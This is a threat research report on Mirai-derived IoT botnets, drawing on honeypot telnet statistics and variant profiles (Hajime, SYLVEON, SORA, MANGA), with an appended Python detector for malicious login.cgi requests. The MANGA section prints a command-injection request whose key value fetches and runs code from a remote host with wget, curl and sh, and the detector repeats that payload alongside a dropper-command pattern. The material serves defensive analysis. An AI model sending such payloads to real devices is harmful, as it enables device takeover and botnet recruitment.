FortiGuard Labs Threat Research

The Ghosts of Mirai

By David Maciejak and Joie Salvio | June 24, 2021

FortiGuard Labs Threat Research Report

Affected Platforms: Linux
Impacted Users: Any organization
Impact: Remote attackers gain control of the vulnerable systems
Severity Level: Critical

It has been almost five years since the source code of the notorious Mirai IoT malware was released to the public by its author in late 2016. This event led to the emergence of numerous copycats, each creating its own flavor of IoT botnet army. Although various threat actors have constantly added improvements since then, the structure and goal of the campaigns have remained the same.

IoT malware scans the Internet for IoT devices that use default or weak usernames and passwords. It also seeks to exploit known—and sometimes even zero-day—vulnerabilities to increase its chances of gaining access. Once it does, malicious binaries are downloaded and executed that make the device part of a zombie network, which can then be instructed to participate in a Distributed Denial-of-Service (DDoS) attack that causes a service outage for an unfortunate target. Some threat actors even sell these curated botnets as a service.

We have been closely monitoring the current state of the IoT botnet threat landscape through the perspective of an IoT device with the help of a honeypot system. This article describes our observations over the last few weeks.

Where are These Attacks Coming From?

To simulate what it would be like for a new IoT device to be connected to the internet for the first time, we set up a fresh honeypot system to capture what kinds of attacks it would receive. This honeypot was designed to be vulnerable to telnet credential brute force attacks. The statistics in this article were taken from a three-week period.

On average, this honeypot system received around 200 attacks per day, ultimately recording nearly 4700 telnet connections in just three weeks. We were then able to identify nearly 4000 of those attacks and connect them to a Mirai-related malware family. 

Figure 1 Number of telnet connections per day

Since this honeypot does not execute any of the downloaded binaries, most of the attacks keep retrying until their malware has executed in the system. By removing IP duplicates, the actual number of attack sources was obtained and is broken down in the next table.

Figure 2 Unique telnet source IPs per country

Top IoT Malware Variants

Mirai variant authors embed unique strings or tokens in their binaries to verify whether SSH or Telnet commands were successfully executed on the device—although the same strings could also be used by the threat actors to advertise their malware or, in some cases, simply as a placeholder for novelty messages.

The figure below shows a sequence of commands that the SORA Mirai variant executes immediately after gaining access to a device.

Figure 3 Sample shell commands executed by a SORA bot

These strings have been heavily used by researchers over time to classify variants. However, there are cases where variants may use different tokens but turn out to be the same malware function-wise—and are even operated by the same threat actor. In such cases, analyzing the actual binary being downloaded into the device would greatly help further define the number of existing variants.

Based on the attacks received by the honeypot, the following table shows the top 10 variants we were able to identify.

Figure 4 Top ten identified variants

The Enigmatic “Hajime”

Hajime was dubbed the successor to the first generation of Mirai. Built on the same principles and goals as its predecessor, it tries to propagate to IoT devices by brute-forcing credentials using a password list of common default device passwords. However, unlike Mirai, Hajime utilizes a decentralized peer-to-peer network to issue commands to its bots. This makes it much harder to locate the Command-and-Control (C2) server for a takedown.

Aside from its sophisticated bot network communication, it is also one of the most mysterious variants due to its vague intentions. Commands sent to Hajime bots are in the form of structured messages that are passed along in the peer-to-peer network. One of these commands instructs bots to download and execute binaries, internally called "modules". Only the spreading module has been observed being served in the wild. No attack or disruptive modules have been observed, and Hajime has never been associated with any disruption attacks. Furthermore, part of its behavior is to block access to ports that are commonly targeted by other IoT malware, thereby inadvertently (or not) somewhat protecting the infected device from further infections.

Lastly, it delivers the following message to the device’s terminal:

Just a white hat, securing some systems.

Important messages will be signed like this!

Hajime Author.

Contact CLOSED Stay sharp!

It was only a matter of time before some speculated that Hajime might be the work of a real vigilante.

SYLVEON Coming Out of Retirement?

What surprised us more was the appearance of the SYLVEON variant in the table. In mid-2019 there was a 14-year-old European IoT malware author who went by the names “Light The Sylveon” and “Light The Leafeon”.

When we took a quick look at the decrypted strings of one of the binaries we captured, the word “Leafeon” was found, creating speculation that this might be the author’s comeback.

Figure 5 Strings found in SYLVEON binaries

“Light the Sylveon” co-created the destructive SILEX IoT malware, whose goal was to render vulnerable devices inoperable by running destructive commands, very similar to BrickerBot. From the malware authors’ perspective, based on a message embedded in the malware’s binary, this was to “prevent skids to flex their skidded botnet.”

Eventually, the “Light The Sylveon” author announced through a post on his Twitter account that he was going to abandon the project.

Figure 6 "Light The Sylveon" announces quitting in a Twitter post

Unlike SILEX, however, SYLVEON is a conventional IoT malware that was clearly based on the Mirai source code with some added attacks.

Figure 7 Function name list found in a SYLVEON binary

Interestingly enough, the group greek.Helios and a certain Thar3seller, who were previously associated with other IoT malware campaigns, currently claim to be the authors of this variant.

Figure 8 Strings found in a SYLVEON binary

The relationship between these different authors is still unclear. What we are certain about is that this variant is being actively operated, as also shown by recently updated binaries found in one of its download servers.

Figure 9 Open directory hosting SYLVEON variant

SORA - The Surviving Member of the Wicked Family

It is also interesting to see Mirai variants authored by the threat actor known as Wicked, whom we covered three years ago. These variants include Owari, Omni, Wicked, and SORA. In an interview at that time, the author stated he was going to focus on Owari and Omni while abandoning the other two variants, including SORA. Based on our observations, it seems that SORA has survived more successfully than its siblings.

Mirai Variant MANGA Actively Updates its List of Targeted Vulnerabilities

Aside from the honeypot, we have also been monitoring Mirai variants from other sources. In particular, we have been closely monitoring the developments of the MANGA variant because it is one of the most active in terms of adding new exploit vectors to its list.

In fact, just a week ago, it added several more exploits, two of which are fairly recent:

  • OptiLink GPON Remote Code Execution
    Figure 10 Sample request leading to an RCE on OptiLink GPON
  • CVE-2021-1498
    Figure 11 Sample request targeting CVE-2021-1498
  • CVE-2021-31755
    Figure 12 Sample request targeting CVE-2021-31755
  • Unknown 1 (Unidentified target)
    Sample request:
    Figure 13 Sample request targeting an unknown target

Here is a list of other vulnerabilities this malware variant tries to exploit:

  • F5 iControl REST Remote Code Execution
  • mini_httpd 1.18 Escape Sequence
  • XiongMai uc-httpd Buffer Overflow
  • TerraMaster TOS Remote Code Execution
  • D-Link DIR-825 Buffer Overflow
  • D-Link DNS-320 Remote Code Execution
  • Micro Focus OBR Remote Code Execution
  • Yealink DM (Device Management) Remote Code Execution
  • F5 BIG-IP Buffer Overflow
  • SonicWall SSL-VPN Remote Code Execution
  • Unknown 2: key parameter on /cgi-bin/login.cgi leading to Remote Code Execution

Sample request:

POST /cgi-bin/login.cgi HTTP/1.1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0

key=';`cd /tmp; wget http://{REDACTED IP}/; curl -O http://{REDACTED IP}/; chmod 777; sh;`;#

Figure 14 List of other vulnerabilities being targeted by Manga
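As an added detection illustration (this is not code from the FortiGuard report or from the MANGA sample), the following Python script parses raw HTTP POST requests of the kind shown above and flags the command-injection pattern in the key parameter of /cgi-bin/login.cgi: shell metacharacters plus the download-and-execute chain (wget, curl, chmod, sh). Both requests and the 192.0.2.10 address are constructed samples, not observed indicators.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample requests modelled on the login.cgi request above.
# 192.0.2.10 is a documentation address standing in for the redacted IP.
MALICIOUS_REQUEST = (
    "POST /cgi-bin/login.cgi HTTP/1.1\r\n"
    "Connection: keep-alive\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0\r\n"
    "\r\n"
    "key=';`cd /tmp; wget http://192.0.2.10/; curl -O http://192.0.2.10/; chmod 777; sh;`;#"
)
BENIGN_REQUEST = (
    "POST /cgi-bin/login.cgi HTTP/1.1\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "key=abc123&user=admin"
)

# Shell metacharacters that have no business in a login key value.
SHELL_META = re.compile(r"[;`|&]|\$\(")
# Download-and-execute chain typical of Mirai-style droppers.
DROPPER_CMDS = re.compile(r"\b(wget|curl|tftp|chmod|sh|busybox)\b")

def parse_request(raw):
    """Split a raw HTTP request into (method, path, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    parts = head.split("\r\n", 1)[0].split(" ", 2)
    if len(parts) < 2:
        return "", "", body
    return parts[0], parts[1], body

def form_params(body):
    """Decode an x-www-form-urlencoded body; '&' only, so ';' stays in the value."""
    params = {}
    for pair in body.split("&"):
        name, _, value = pair.partition("=")
        params[unquote_plus(name)] = unquote_plus(value)
    return params

def inspect_login_request(raw):
    """Return a verdict dict for a login.cgi POST; non-matching requests are ignored."""
    method, path, body = parse_request(raw)
    if method != "POST" or path != "/cgi-bin/login.cgi":
        return {"suspicious": False, "reason": "not a login.cgi POST"}
    key = form_params(body).get("key", "")
    findings = []
    if SHELL_META.search(key):
        findings.append("shell metacharacters in key")
    cmds = sorted(set(DROPPER_CMDS.findall(key)))
    if cmds:
        findings.append("dropper commands: " + ", ".join(cmds))
    return {"suspicious": bool(findings), "reason": "; ".join(findings) or "clean"}
```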


As the number of installed IoT devices continues to explode, especially given the current lack of security standards available to protect them, IoT will be a hotbed for malware operations for the foreseeable future, as we have demonstrated in this article. And interestingly, Mirai variants are still very active in terms of attack and development.


Every artifact collected from our honeypot systems and other sources is automatically processed to ensure that our customers are protected from these attacks. That said, the following precautions are highly recommended:

  • As credential brute-forcing is still the primary way malware gets into IoT devices, setting usernames and passwords that are difficult to guess can go a long way towards securing them.
  • In addition, to protect against known vulnerabilities, always keep device software up to date.
